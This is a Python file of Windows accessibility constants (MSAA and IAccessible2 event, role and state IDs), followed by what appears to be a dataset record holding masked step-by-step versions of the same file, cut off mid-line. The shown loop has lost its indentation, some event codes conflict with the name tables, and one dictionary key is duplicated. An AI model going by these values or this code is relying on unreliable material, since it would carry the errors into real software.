EVENT_OBJECT_LOCATIONCHANGE = 0x800b
EVENT_OBJECT_NAMECHANGE = 0x800c
EVENT_OBJECT_DESCRIPTIONCHANGE = 0x800d
EVENT_OBJECT_VALUECHANGE = 0x800e
EVENT_OBJECT_PARENTCHANGE = 0x800f
EVENT_OBJECT_HELPCHANGE = 0x8010
EVENT_OBJECT_DEFACTIONCHANGE = 0x8011
EVENT_OBJECT_ACCELERATORCHANGE = 0x8012
EVENT_CONSOLE_CARET = 0x4001
EVENT_CONSOLE_UPDATE_REGION = 0x4002
EVENT_CONSOLE_UPDATE_SIMPLE = 0x4003
EVENT_CONSOLE_UPDATE_SCROLL = 0x4004
EVENT_CONSOLE_LAYOUT = 0x4005
EVENT_CONSOLE_START_APPLICATION = 0x4006
EVENT_CONSOLE_END_APPLICATION = 0x4007
# IAccessible2 events
IA2_EVENT_ACTION_CHANGED = 0x101
IA2_EVENT_ACTIVE_DECENDENT_CHANGED = 0x102
IA2_EVENT_ACTIVE_DESCENDANT_CHANGED = 0x102
IA2_EVENT_DOCUMENT_ATTRIBUTE_CHANGED = 0x103
IA2_EVENT_DOCUMENT_CONTENT_CHANGED = 0x104
IA2_EVENT_DOCUMENT_LOAD_COMPLETE = 0x105
IA2_EVENT_DOCUMENT_LOAD_STOPPED = 0x106
IA2_EVENT_DOCUMENT_RELOAD = 0x107
IA2_EVENT_HYPERLINK_END_INDEX_CHANGED = 0x108
IA2_EVENT_HYPERLINK_NUMBER_OF_ANCHORS_CHANGED = 0x109
IA2_EVENT_HYPERLINK_SELECTED_LINK_CHANGED = 0x10a
IA2_EVENT_HYPERTEXT_LINK_ACTIVATED = 0x10b
IA2_EVENT_HYPERTEXT_LINK_SELECTED = 0x10c
IA2_EVENT_HYPERLINK_START_INDEX_CHANGED = 0x10d
IA2_EVENT_HYPERTEXT_CHANGED = 0x10e
IA2_EVENT_HYPERTEXT_NLINKS_CHANGED = 0x11f
IA2_EVENT_OBJECT_ATTRIBUTE_CHANGED = 0x120
IA2_EVENT_PAGE_CHANGED = 0x111
IA2_EVENT_SECTION_CHANGED = 0x112
IA2_EVENT_TABLE_CAPTION_CHANGED = 0x113
IA2_EVENT_TABLE_COLUMN_DESCRIPTION_CHANGED = 0x114
IA2_EVENT_TABLE_COLUMN_HEADER_CHANGED = 0x115
IA2_EVENT_TABLE_MODEL_CHANGED = 0x116
IA2_EVENT_TABLE_ROW_DESCRIPTION_CHANGED = 0x117
IA2_EVENT_TABLE_ROW_HEADER_CHANGED = 0x118
IA2_EVENT_TABLE_SUMMARY_CHANGED = 0x119
IA2_EVENT_TEXT_ATTRIBUTE_CHANGED = 0x11a
IA2_EVENT_TEXT_CARET_MOVED = 0x11b
IA2_EVENT_TEXT_CHANGED = 0x11c
IA2_EVENT_TEXT_COLUMN_CHANGED = 0x11d
IA2_EVENT_TEXT_INSERTED = 0x11e
IA2_EVENT_TEXT_REMOVED = 0x11f
IA2_EVENT_TEXT_UPDATED = 0x120
IA2_EVENT_TEXT_SELECTION_CHANGED = 0x121
IA2_EVENT_VISIBLE_DATA_CHANGED = 0x122
UNLOCALIZED_EVENT_NAMES = {
0x1: u'EVENT_SYSTEM_SOUND',
0x2: u'EVENT_SYSTEM_ALERT',
0x3: u'EVENT_SYSTEM_FOREGROUND',
0x4: u'EVENT_SYSTEM_MENUSTART',
0x5: u'EVENT_SYSTEM_MENUEND',
0x6: u'EVENT_SYSTEM_MENUPOPUPSTART',
0x7: u'EVENT_SYSTEM_MENUPOPUPEND',
0x8: u'EVENT_SYSTEM_CAPTURESTART',
0x9: u'EVENT_SYSTEM_CAPTUREEND',
0xa: u'EVENT_SYSTEM_MOVESIZESTART',
0xb: u'EVENT_SYSTEM_MOVESIZEEND',
0xc: u'EVENT_SYSTEM_CONTEXTHELPSTART',
0xd: u'EVENT_SYSTEM_CONTEXTHELPEND',
0xe: u'EVENT_SYSTEM_DRAGDROPSTART',
0xf: u'EVENT_SYSTEM_DRAGDROPEND',
0x10: u'EVENT_SYSTEM_DIALOGSTART',
0x11: u'EVENT_SYSTEM_DIALOGEND',
0x12: u'EVENT_SYSTEM_SCROLLINGSTART',
0x13: u'EVENT_SYSTEM_SCROLLINGEND',
0x14: u'EVENT_SYSTEM_SWITCHSTART',
0x15: u'EVENT_SYSTEM_SWITCHEND',
0x16: u'EVENT_SYSTEM_MINIMIZESTART',
0x17: u'EVENT_SYSTEM_MINIMIZEEND',
0x101: u'IA2_EVENT_ACTION_CHANGED',
0x102: u'IA2_EVENT_ACTIVE_DESCENDANT_CHANGED',
0x103: u'IA2_EVENT_DOCUMENT_ATTRIBUTE_CHANGED',
0x104: u'IA2_EVENT_DOCUMENT_CONTENT_CHANGED',
0x105: u'IA2_EVENT_DOCUMENT_LOAD_COMPLETE',
0x106: u'IA2_EVENT_DOCUMENT_LOAD_STOPPED',
0x107: u'IA2_EVENT_DOCUMENT_RELOAD',
0x108: u'IA2_EVENT_HYPERLINK_END_INDEX_CHANGED',
0x109: u'IA2_EVENT_HYPERLINK_NUMBER_OF_ANCHORS_CHANGED',
0x10a: u'IA2_EVENT_HYPERLINK_SELECTED_LINK_CHANGED',
0x10b: u'IA2_EVENT_HYPERTEXT_LINK_ACTIVATED',
0x10c: u'IA2_EVENT_HYPERTEXT_LINK_SELECTED',
0x10d: u'IA2_EVENT_HYPERLINK_START_INDEX_CHANGED',
0x10e: u'IA2_EVENT_HYPERTEXT_CHANGED',
0x10f: u'IA2_EVENT_HYPERTEXT_NLINKS_CHANGED',
0x110: u'IA2_EVENT_OBJECT_ATTRIBUTE_CHANGED',
0x111: u'IA2_EVENT_PAGE_CHANGED',
0x112: u'IA2_EVENT_SECTION_CHANGED',
0x113: u'IA2_EVENT_TABLE_CAPTION_CHANGED',
0x114: u'IA2_EVENT_TABLE_COLUMN_DESCRIPTION_CHANGED',
0x115: u'IA2_EVENT_TABLE_COLUMN_HEADER_CHANGED',
0x116: u'IA2_EVENT_TABLE_MODEL_CHANGED',
0x117: u'IA2_EVENT_TABLE_ROW_DESCRIPTION_CHANGED',
0x118: u'IA2_EVENT_TABLE_ROW_HEADER_CHANGED',
0x119: u'IA2_EVENT_TABLE_SUMMARY_CHANGED',
0x11a: u'IA2_EVENT_TEXT_ATTRIBUTE_CHANGED',
0x11b: u'IA2_EVENT_TEXT_CARET_MOVED',
0x11c: u'IA2_EVENT_TEXT_CHANGED',
0x11d: u'IA2_EVENT_TEXT_COLUMN_CHANGED',
0x11e: u'IA2_EVENT_TEXT_INSERTED',
0x11f: u'IA2_EVENT_TEXT_REMOVED',
0x120: u'IA2_EVENT_TEXT_UPDATED',
0x121: u'IA2_EVENT_TEXT_SELECTION_CHANGED',
0x122: u'IA2_EVENT_VISIBLE_DATA_CHANGED',
0x4001: u'EVENT_CONSOLE_CARET',
0x4002: u'EVENT_CONSOLE_UPDATE_REGION',
0x4003: u'EVENT_CONSOLE_UPDATE_SIMPLE',
0x4004: u'EVENT_CONSOLE_UPDATE_SCROLL',
0x4005: u'EVENT_CONSOLE_LAYOUT',
0x4006: u'EVENT_CONSOLE_START_APPLICATION',
0x4007: u'EVENT_CONSOLE_END_APPLICATION',
0x8000: u'EVENT_OBJECT_CREATE',
0x8001: u'EVENT_OBJECT_DESTROY',
0x8002: u'EVENT_OBJECT_SHOW',
0x8003: u'EVENT_OBJECT_HIDE',
0x8004: u'EVENT_OBJECT_REORDER',
0x8005: u'EVENT_OBJECT_FOCUS',
0x8006: u'EVENT_OBJECT_SELECTION',
0x8007: u'EVENT_OBJECT_SELECTIONADD',
0x8008: u'EVENT_OBJECT_SELECTIONREMOVE',
0x8009: u'EVENT_OBJECT_SELECTIONWITHIN',
0x800a: u'EVENT_OBJECT_STATECHANGE',
0x800b: u'EVENT_OBJECT_LOCATIONCHANGE',
0x800c: u'EVENT_OBJECT_NAMECHANGE',
0x800d: u'EVENT_OBJECT_DESCRIPTIONCHANGE',
0x800e: u'EVENT_OBJECT_VALUECHANGE',
0x800f: u'EVENT_OBJECT_PARENTCHANGE',
0x8010: u'EVENT_OBJECT_HELPCHANGE',
0x8011: u'EVENT_OBJECT_DEFACTIONCHANGE',
0x8012: u'EVENT_OBJECT_ACCELERATORCHANGE'}
winEventIDsToEventNames={}
for _sym, _val in locals().items():
if _sym.startswith('EVENT_') or _sym.startswith('IA2_EVENT_'):
winEventIDsToEventNames[_val] = _sym
|
normal
|
{
"blob_id": "5ec2ac3e0d66026da1b0c957d10c95e95c201f8f",
"index": 9032,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor _sym, _val in locals().items():\n if _sym.startswith('EVENT_') or _sym.startswith('IA2_EVENT_'):\n winEventIDsToEventNames[_val] = _sym\n",
"step-3": "<mask token>\nCHILDID_SELF = 0\nIA2_TEXT_OFFSET_LENGTH = -1\nIA2_TEXT_OFFSET_CARET = -2\nROLE_SYSTEM_ALERT = 8\nROLE_SYSTEM_ANIMATION = 54\nROLE_SYSTEM_APPLICATION = 14\nROLE_SYSTEM_BORDER = 19\nROLE_SYSTEM_BUTTONDROPDOWN = 56\nROLE_SYSTEM_BUTTONDROPDOWNGRID = 58\nROLE_SYSTEM_BUTTONMENU = 57\nROLE_SYSTEM_CARET = 7\nROLE_SYSTEM_CELL = 29\nROLE_SYSTEM_CHARACTER = 32\nROLE_SYSTEM_CHART = 17\nROLE_SYSTEM_CHECKBUTTON = 44\nROLE_SYSTEM_CLIENT = 10\nROLE_SYSTEM_CLOCK = 61\nROLE_SYSTEM_COLUMN = 27\nROLE_SYSTEM_COLUMNHEADER = 25\nROLE_SYSTEM_COMBOBOX = 46\nROLE_SYSTEM_CURSOR = 6\nROLE_SYSTEM_DIAGRAM = 53\nROLE_SYSTEM_DIAL = 49\nROLE_SYSTEM_DIALOG = 18\nROLE_SYSTEM_DOCUMENT = 15\nROLE_SYSTEM_DROPLIST = 47\nROLE_SYSTEM_EQUATION = 55\nROLE_SYSTEM_GRAPHIC = 40\nROLE_SYSTEM_GRIP = 4\nROLE_SYSTEM_GROUPING = 20\nROLE_SYSTEM_HELPBALLOON = 31\nROLE_SYSTEM_HOTKEYFIELD = 50\nROLE_SYSTEM_INDICATOR = 39\nROLE_SYSTEM_LINK = 30\nROLE_SYSTEM_LIST = 33\nROLE_SYSTEM_LISTITEM = 34\nROLE_SYSTEM_MENUBAR = 2\nROLE_SYSTEM_MENUITEM = 12\nROLE_SYSTEM_MENUPOPUP = 11\nROLE_SYSTEM_OUTLINE = 35\nROLE_SYSTEM_OUTLINEITEM = 36\nROLE_SYSTEM_PAGETAB = 37\nROLE_SYSTEM_PAGETABLIST = 60\nROLE_SYSTEM_PANE = 16\nROLE_SYSTEM_PROGRESSBAR = 48\nROLE_SYSTEM_PROPERTYPAGE = 38\nROLE_SYSTEM_PUSHBUTTON = 43\nROLE_SYSTEM_RADIOBUTTON = 45\nROLE_SYSTEM_ROW = 28\nROLE_SYSTEM_ROWHEADER = 26\nROLE_SYSTEM_SCROLLBAR = 3\nROLE_SYSTEM_SEPARATOR = 21\nROLE_SYSTEM_SLIDER = 51\nROLE_SYSTEM_SOUND = 5\nROLE_SYSTEM_SPINBUTTON = 52\nROLE_SYSTEM_STATICTEXT = 41\nROLE_SYSTEM_STATUSBAR = 23\nROLE_SYSTEM_TABLE = 24\nROLE_SYSTEM_TEXT = 42\nROLE_SYSTEM_TITLEBAR = 1\nROLE_SYSTEM_TOOLBAR = 22\nROLE_SYSTEM_TOOLTIP = 13\nROLE_SYSTEM_WHITESPACE = 59\nROLE_SYSTEM_WINDOW = 9\nIA2_ROLE_UNKNOWN = 0\nIA2_ROLE_CANVAS = 1025\nIA2_ROLE_CAPTION = 1026\nIA2_ROLE_CHECK_MENU_ITEM = 1027\nIA2_ROLE_COLOR_CHOOSER = 1028\nIA2_ROLE_DATE_EDITOR = 1029\nIA2_ROLE_DESKTOP_ICON = 1030\nIA2_ROLE_DESKTOP_PANE = 1031\nIA2_ROLE_DIRECTORY_PANE = 1032\nIA2_ROLE_EDITBAR = 1033\nIA2_ROLE_EMBEDDED_OBJECT = 1034\nIA2_ROLE_ENDNOTE = 1035\nIA2_ROLE_FILE_CHOOSER = 1036\nIA2_ROLE_FONT_CHOOSER = 1037\nIA2_ROLE_FOOTER = 1038\nIA2_ROLE_FOOTNOTE = 1039\nIA2_ROLE_FORM = 1040\nIA2_ROLE_FRAME = 1041\nIA2_ROLE_GLASS_PANE = 1042\nIA2_ROLE_HEADER = 1043\nIA2_ROLE_HEADING = 1044\nIA2_ROLE_ICON = 1045\nIA2_ROLE_IMAGE_MAP = 1046\nIA2_ROLE_INPUT_METHOD_WINDOW = 1047\nIA2_ROLE_INTERNAL_FRAME = 1048\nIA2_ROLE_LABEL = 1049\nIA2_ROLE_LAYERED_PANE = 1050\nIA2_ROLE_NOTE = 1051\nIA2_ROLE_OPTION_PANE = 1052\nIA2_ROLE_PAGE = 1053\nIA2_ROLE_PARAGRAPH = 1054\nIA2_ROLE_RADIO_MENU_ITEM = 1055\nIA2_ROLE_REDUNDANT_OBJECT = 1056\nIA2_ROLE_ROOT_PANE = 1057\nIA2_ROLE_RULER = 1058\nIA2_ROLE_SCROLL_PANE = 1059\nIA2_ROLE_SECTION = 1060\nIA2_ROLE_SHAPE = 1061\nIA2_ROLE_SPLIT_PANE = 1062\nIA2_ROLE_TEAR_OFF_MENU = 1063\nIA2_ROLE_TERMINAL = 1064\nIA2_ROLE_TEXT_FRAME = 1065\nIA2_ROLE_TOGGLE_BUTTON = 1066\nIA2_ROLE_VIEW_PORT = 1067\nIA2_ROLE_COMPLEMENTARY_CONTENT = 1068\nIA2_ROLE_LANDMARK = 1069\nUNLOCALIZED_ROLE_NAMES = {(1): u'ROLE_SYSTEM_TITLEBAR', (2):\n u'ROLE_SYSTEM_MENUBAR', (3): u'ROLE_SYSTEM_SCROLLBAR', (4):\n u'ROLE_SYSTEM_GRIP', (5): u'ROLE_SYSTEM_SOUND', (6):\n u'ROLE_SYSTEM_CURSOR', (7): u'ROLE_SYSTEM_CARET', (8):\n u'ROLE_SYSTEM_ALERT', (9): u'ROLE_SYSTEM_WINDOW', (10):\n u'ROLE_SYSTEM_CLIENT', (11): u'ROLE_SYSTEM_MENUPOPUP', (12):\n u'ROLE_SYSTEM_MENUITEM', (13): u'ROLE_SYSTEM_TOOLTIP', (14):\n u'ROLE_SYSTEM_APPLICATION', (15): u'ROLE_SYSTEM_DOCUMENT', (16):\n u'ROLE_SYSTEM_PANE', (17): u'ROLE_SYSTEM_CHART', (18):\n u'ROLE_SYSTEM_DIALOG', (19): u'ROLE_SYSTEM_BORDER', (20):\n u'ROLE_SYSTEM_GROUPING', (21): u'ROLE_SYSTEM_SEPARATOR', (22):\n u'ROLE_SYSTEM_TOOLBAR', (23): u'ROLE_SYSTEM_STATUSBAR', (24):\n u'ROLE_SYSTEM_TABLE', (25): u'ROLE_SYSTEM_COLUMNHEADER', (26):\n u'ROLE_SYSTEM_ROWHEADER', (27): u'ROLE_SYSTEM_COLUMN', (28):\n u'ROLE_SYSTEM_ROW', (29): u'ROLE_SYSTEM_CELL', (30):\n u'ROLE_SYSTEM_LINK', (31): u'ROLE_SYSTEM_HELPBALLOON', (32):\n u'ROLE_SYSTEM_CHARACTER', (33): u'ROLE_SYSTEM_LIST', (34):\n u'ROLE_SYSTEM_LISTITEM', (35): u'ROLE_SYSTEM_OUTLINE', (36):\n u'ROLE_SYSTEM_OUTLINEITEM', (37): u'ROLE_SYSTEM_PAGETAB', (38):\n u'ROLE_SYSTEM_PROPERTYPAGE', (39): u'ROLE_SYSTEM_INDICATOR', (40):\n u'ROLE_SYSTEM_GRAPHIC', (41): u'ROLE_SYSTEM_STATICTEXT', (42):\n u'ROLE_SYSTEM_TEXT', (43): u'ROLE_SYSTEM_PUSHBUTTON', (44):\n u'ROLE_SYSTEM_CHECKBUTTON', (45): u'ROLE_SYSTEM_RADIOBUTTON', (46):\n u'ROLE_SYSTEM_COMBOBOX', (47): u'ROLE_SYSTEM_DROPLIST', (48):\n u'ROLE_SYSTEM_PROGRESSBAR', (49): u'ROLE_SYSTEM_DIAL', (50):\n u'ROLE_SYSTEM_HOTKEYFIELD', (51): u'ROLE_SYSTEM_SLIDER', (52):\n u'ROLE_SYSTEM_SPINBUTTON', (53): u'ROLE_SYSTEM_DIAGRAM', (54):\n u'ROLE_SYSTEM_ANIMATION', (55): u'ROLE_SYSTEM_EQUATION', (56):\n u'ROLE_SYSTEM_BUTTONDROPDOWN', (57): u'ROLE_SYSTEM_BUTTONMENU', (58):\n u'ROLE_SYSTEM_BUTTONDROPDOWNGRID', (59): u'ROLE_SYSTEM_WHITESPACE', (60\n ): u'ROLE_SYSTEM_PAGETABLIST', (61): u'ROLE_SYSTEM_CLOCK'}\nUNLOCALIZED_IA2_ROLE_NAMES = {(0): u'IA2_ROLE_UNKNOWN', (1025):\n u'IA2_ROLE_CANVAS', (1026): u'IA2_ROLE_CAPTION', (1027):\n u'IA2_ROLE_CHECK_MENU_ITEM', (1028): u'IA2_ROLE_COLOR_CHOOSER', (1029):\n u'IA2_ROLE_DATE_EDITOR', (1030): u'IA2_ROLE_DESKTOP_ICON', (1031):\n u'IA2_ROLE_DESKTOP_PANE', (1032): u'IA2_ROLE_DIRECTORY_PANE', (1033):\n u'IA2_ROLE_EDITBAR', (1034): u'IA2_ROLE_EMBEDDED_OBJECT', (1035):\n u'IA2_ROLE_ENDNOTE', (1036): u'IA2_ROLE_FILE_CHOOSER', (1037):\n u'IA2_ROLE_FONT_CHOOSER', (1038): u'IA2_ROLE_FOOTER', (1039):\n u'IA2_ROLE_FOOTNOTE', (1040): u'IA2_ROLE_FORM', (1041):\n u'IA2_ROLE_FRAME', (1042): u'IA2_ROLE_GLASS_PANE', (1043):\n u'IA2_ROLE_HEADER', (1044): u'IA2_ROLE_HEADING', (1045):\n u'IA2_ROLE_ICON', (1046): u'IA2_ROLE_IMAGE_MAP', (1047):\n u'IA2_ROLE_INPUT_METHOD_WINDOW', (1048): u'IA2_ROLE_INTERNAL_FRAME', (\n 1049): u'IA2_ROLE_LABEL', (1050): u'IA2_ROLE_LAYERED_PANE', (1051):\n u'IA2_ROLE_NOTE', (1052): u'IA2_ROLE_OPTION_PANE', (1053):\n u'IA2_ROLE_PAGE', (1054): u'IA2_ROLE_PARAGRAPH', (1055):\n u'IA2_ROLE_RADIO_MENU_ITEM', (1056): u'IA2_ROLE_REDUNDANT_OBJECT', (\n 1057): u'IA2_ROLE_ROOT_PANE', (1058): u'IA2_ROLE_RULER', (1059):\n u'IA2_ROLE_SCROLL_PANE', (1060): u'IA2_ROLE_SECTION', (1061):\n u'IA2_ROLE_SHAPE', (1062): u'IA2_ROLE_SPLIT_PANE', (1063):\n u'IA2_ROLE_TEAR_OFF_MENU', (1064): u'IA2_ROLE_TERMINAL', (1065):\n u'IA2_ROLE_TEXT_FRAME', (1066): u'IA2_ROLE_TOGGLE_BUTTON', (1067):\n u'IA2_ROLE_VIEW_PORT', (1068): u'IA2_ROLE_COMPLEMENTARY_CONTENT', (1069\n ): u'IA2_ROLE_LANDMARK'}\nNAVDIR_DOWN = 2\nNAVDIR_FIRSTCHILD = 7\nNAVDIR_LASTCHILD = 8\nNAVDIR_LEFT = 3\nNAVDIR_NEXT = 5\nNAVDIR_PREVIOUS = 6\nNAVDIR_RIGHT = 4\nNAVDIR_UP = 1\nSTATE_SYSTEM_UNAVAILABLE = 1\nSTATE_SYSTEM_SELECTED = 2\nSTATE_SYSTEM_FOCUSED = 4\nSTATE_SYSTEM_PRESSED = 8\nSTATE_SYSTEM_CHECKED = 16\nSTATE_SYSTEM_MIXED = 32\nSTATE_SYSTEM_READONLY = 64\nSTATE_SYSTEM_HOTTRACKED = 128\nSTATE_SYSTEM_DEFAULT = 256\nSTATE_SYSTEM_EXPANDED = 512\nSTATE_SYSTEM_COLLAPSED = 1024\nSTATE_SYSTEM_BUSY = 2048\nSTATE_SYSTEM_FLOATING = 4096\nSTATE_SYSTEM_MARQUEED = 8192\nSTATE_SYSTEM_ANIMATED = 16384\nSTATE_SYSTEM_INVISIBLE = 32768\nSTATE_SYSTEM_OFFSCREEN = 65536\nSTATE_SYSTEM_SIZEABLE = 131072\nSTATE_SYSTEM_MOVEABLE = 262144\nSTATE_SYSTEM_SELFVOICING = 524288\nSTATE_SYSTEM_FOCUSABLE = 1048576\nSTATE_SYSTEM_SELECTABLE = 2097152\nSTATE_SYSTEM_LINKED = 4194304\nSTATE_SYSTEM_TRAVERSED = 8388608\nSTATE_SYSTEM_MULTISELECTABLE = 16777216\nSTATE_SYSTEM_EXTSELECTABLE = 33554432\nSTATE_SYSTEM_HASSUBMENU = 67108864\nSTATE_SYSTEM_ALERT_LOW = 67108864\nSTATE_SYSTEM_ALERT_MEDIUM = 134217728\nSTATE_SYSTEM_ALERT_HIGH = 268435456\nSTATE_SYSTEM_PROTECTED = 536870912\nSTATE_SYSTEM_HASPOPUP = 1073741824\nSTATE_SYSTEM_VALID = 536870911\nUNLOCALIZED_STATE_NAMES = {(1): u'STATE_SYSTEM_UNAVAILABLE', (2):\n u'STATE_SYSTEM_SELECTED', (4): u'STATE_SYSTEM_FOCUSED', (8):\n u'STATE_SYSTEM_PRESSED', (16): u'STATE_SYSTEM_CHECKED', (32):\n u'STATE_SYSTEM_MIXED', (64): u'STATE_SYSTEM_READONLY', (128):\n u'STATE_SYSTEM_HOTTRACKED', (256): u'STATE_SYSTEM_DEFAULT', (512):\n u'STATE_SYSTEM_EXPANDED', (1024): u'STATE_SYSTEM_COLLAPSED', (2048):\n u'STATE_SYSTEM_BUSY', (4096): u'STATE_SYSTEM_FLOATING', (8192):\n u'STATE_SYSTEM_MARQUEED', (16384): u'STATE_SYSTEM_ANIMATED', (32768):\n u'STATE_SYSTEM_INVISIBLE', (65536): u'STATE_SYSTEM_OFFSCREEN', (131072):\n u'STATE_SYSTEM_SIZEABLE', (262144): u'STATE_SYSTEM_MOVEABLE', (524288):\n u'STATE_SYSTEM_SELFVOICING', (1048576): u'STATE_SYSTEM_FOCUSABLE', (\n 2097152): u'STATE_SYSTEM_SELECTABLE', (4194304): u'STATE_SYSTEM_LINKED',\n (8388608): u'STATE_SYSTEM_TRAVERSED', (16777216):\n u'STATE_SYSTEM_MULTISELECTABLE', (33554432):\n u'STATE_SYSTEM_EXTSELECTABLE', (67108864): u'STATE_SYSTEM_ALERT_LOW', (\n 134217728): u'STATE_SYSTEM_ALERT_MEDIUM', (268435456):\n u'STATE_SYSTEM_ALERT_HIGH', (536870912): u'STATE_SYSTEM_PROTECTED', (\n 1073741824): u'STATE_SYSTEM_HASPOPUP', (536870911): u'STATE_SYSTEM_VALID'}\nIA2_STATE_ACTIVE = 1\nIA2_STATE_ARMED = 2\nIA2_STATE_DEFUNCT = 4\nIA2_STATE_EDITABLE = 8\nIA2_STATE_HORIZONTAL = 16\nIA2_STATE_ICONIFIED = 32\nIA2_STATE_INVALID_ENTRY = 64\nIA2_STATE_MANAGES_DESCENDANTS = 128\nIA2_STATE_MODAL = 256\nIA2_STATE_MULTI_LINE = 512\nIA2_STATE_OPAQUE = 1024\nIA2_STATE_REQUIRED = 2048\nIA2_STATE_SELECTABLE_TEXT = 4096\nIA2_STATE_SINGLE_LINE = 8192\nIA2_STATE_STALE = 16384\nIA2_STATE_SUPPORTS_AUTOCOMPLETION = 32768\nIA2_STATE_TRANSIENT = 65536\nIA2_STATE_VERTICAL = 131072\nIA2_STATE_CHECKABLE = 262144\nIA2_STATE_PINNED = 524288\nUNLOCALIZED_IA2_STATE_NAMES = {(1): u'IA2_STATE_ACTIVE', (2):\n u'IA2_STATE_ARMED', (4): u'IA2_STATE_DEFUNCT', (8):\n u'IA2_STATE_EDITABLE', (16): u'IA2_STATE_HORIZONTAL', (32):\n u'IA2_STATE_ICONIFIED', (64): u'IA2_STATE_INVALID_ENTRY', (128):\n u'IA2_STATE_MANAGES_DESCENDANTS', (256): u'IA2_STATE_MODAL', (512):\n u'IA2_STATE_MULTI_LINE', (1024): u'IA2_STATE_OPAQUE', (2048):\n u'IA2_STATE_REQUIRED', (4096): u'IA2_STATE_SELECTABLE_TEXT', (8192):\n u'IA2_STATE_SINGLE_LINE', (16384): u'IA2_STATE_STALE', (32768):\n u'IA2_STATE_SUPPORTS_AUTOCOMPLETION', (65536): u'IA2_STATE_TRANSIENT',\n (131072): u'IA2_STATE_VERTICAL', (262144): u'IA2_STATE_CHECKABLE', (\n 524288): u'IA2_STATE_PINNED'}\nUNLOCALIZED_IA2_RELATION_TYPES = {u'containingApplication':\n u'IA2_RELATION_CONTAINING_APPLICATION', u'containingDocument':\n u'IA2_RELATION_CONTAINING_DOCUMENT', u'containingTabPane':\n u'IA2_RELATION_CONTAINING_TAB_PANE', u'containingWindow':\n u'IA2_RELATION_CONTAINING_WINDOW', u'controlledBy':\n u'IA2_RELATION_CONTROLLED_BY', u'controllerFor':\n u'IA2_RELATION_CONTROLLER_FOR', u'describedBy':\n u'IA2_RELATION_DESCRIBED_BY', u'descriptionFor':\n u'IA2_RELATION_DESCRIPTION_FOR', u'details': u'IA2_RELATION_DETAILS',\n u'detailsFor': u'IA2_RELATION_DETAILS_FOR', u'embeddedBy':\n u'IA2_RELATION_EMBEDDED_BY', u'embeds': u'IA2_RELATION_EMBEDS',\n u'errorMessage': u'IA2_RELATION_ERROR_MESSAGE', u'errorFor':\n u'IA2_RELATION_ERROR_FOR', u'flowsFrom': u'IA2_RELATION_FLOWS_FROM',\n u'flowsTo': u'IA2_RELATION_FLOWS_TO', u'labelFor':\n u'IA2_RELATION_LABEL_FOR', u'labelledBy': u'IA2_RELATION_LABELED_BY',\n u'labelledBy': u'IA2_RELATION_LABELLED_BY', u'memberOf':\n u'IA2_RELATION_MEMBER_OF', u'nextTabbable':\n u'IA2_RELATION_NEXT_TABBABLE', u'nodeChildOf':\n u'IA2_RELATION_NODE_CHILD_OF', u'nodeParentOf':\n u'IA2_RELATION_NODE_PARENT_OF', u'parentWindowOf':\n u'IA2_RELATION_PARENT_WINDOW_OF', u'popupFor':\n u'IA2_RELATION_POPUP_FOR', u'previousTabbable':\n u'IA2_RELATION_PREVIOUS_TABBABLE', u'subwindowOf':\n u'IA2_RELATION_SUBWINDOW_OF'}\nWINEVENT_OUTOFCONTEXT = 0\nWINEVENT_SKIPOWNTHREAD = 1\nWINEVENT_SKIPOWNPROCESS = 2\nWINEVENT_INCONTEXT = 4\nEVENT_SYSTEM_SOUND = 1\nEVENT_SYSTEM_ALERT = 2\nEVENT_SYSTEM_FOREGROUND = 3\nEVENT_SYSTEM_MENUSTART = 4\nEVENT_SYSTEM_MENUEND = 5\nEVENT_SYSTEM_MENUPOPUPSTART = 6\nEVENT_SYSTEM_MENUPOPUPEND = 7\nEVENT_SYSTEM_CAPTURESTART = 8\nEVENT_SYSTEM_CAPTUREEND = 9\nEVENT_SYSTEM_MOVESIZESTART = 10\nEVENT_SYSTEM_MOVESIZEEND = 11\nEVENT_SYSTEM_CONTEXTHELPSTART = 12\nEVENT_SYSTEM_CONTEXTHELPEND = 13\nEVENT_SYSTEM_DRAGDROPSTART = 14\nEVENT_SYSTEM_DRAGDROPEND = 15\nEVENT_SYSTEM_DIALOGSTART = 16\nEVENT_SYSTEM_DIALOGEND = 17\nEVENT_SYSTEM_SCROLLINGSTART = 18\nEVENT_SYSTEM_SCROLLINGEND = 19\nEVENT_SYSTEM_SWITCHSTART = 20\nEVENT_SYSTEM_SWITCHEND = 21\nEVENT_SYSTEM_MINIMIZESTART = 22\nEVENT_SYSTEM_MINIMIZEEND = 23\nEVENT_OBJECT_CREATE = 32768\nEVENT_OBJECT_DESTROY = 32769\nEVENT_OBJECT_SHOW = 32770\nEVENT_OBJECT_HIDE = 32771\nEVENT_OBJECT_REORDER = 32772\nEVENT_OBJECT_FOCUS = 32773\nEVENT_OBJECT_SELECTION = 32774\nEVENT_OBJECT_SELECTIONADD = 32775\nEVENT_OBJECT_SELECTIONREMOVE = 32776\nEVENT_OBJECT_SELECTIONWITHIN = 32777\nEVENT_OBJECT_STATECHANGE = 32778\nEVENT_OBJECT_LOCATIONCHANGE = 32779\nEVENT_OBJECT_NAMECHANGE = 32780\nEVENT_OBJECT_DESCRIPTIONCHANGE = 32781\nEVENT_OBJECT_VALUECHANGE = 32782\nEVENT_OBJECT_PARENTCHANGE = 32783\nEVENT_OBJECT_HELPCHANGE = 32784\nEVENT_OBJECT_DEFACTIONCHANGE = 32785\nEVENT_OBJECT_ACCELERATORCHANGE = 32786\nEVENT_CONSOLE_CARET = 16385\nEVENT_CONSOLE_UPDATE_REGION = 16386\nEVENT_CONSOLE_UPDATE_SIMPLE = 16387\nEVENT_CONSOLE_UPDATE_SCROLL = 16388\nEVENT_CONSOLE_LAYOUT = 16389\nEVENT_CONSOLE_START_APPLICATION = 16390\nEVENT_CONSOLE_END_APPLICATION = 16391\nIA2_EVENT_ACTION_CHANGED = 257\nIA2_EVENT_ACTIVE_DECENDENT_CHANGED = 258\nIA2_EVENT_ACTIVE_DESCENDANT_CHANGED = 258\nIA2_EVENT_DOCUMENT_ATTRIBUTE_CHANGED = 259\nIA2_EVENT_DOCUMENT_CONTENT_CHANGED = 260\nIA2_EVENT_DOCUMENT_LOAD_COMPLETE = 261\nIA2_EVENT_DOCUMENT_LOAD_STOPPED = 262\nIA2_EVENT_DOCUMENT_RELOAD = 263\nIA2_EVENT_HYPERLINK_END_INDEX_CHANGED = 264\nIA2_EVENT_HYPERLINK_NUMBER_OF_ANCHORS_CHANGED = 265\nIA2_EVENT_HYPERLINK_SELECTED_LINK_CHANGED = 266\nIA2_EVENT_HYPERTEXT_LINK_ACTIVATED = 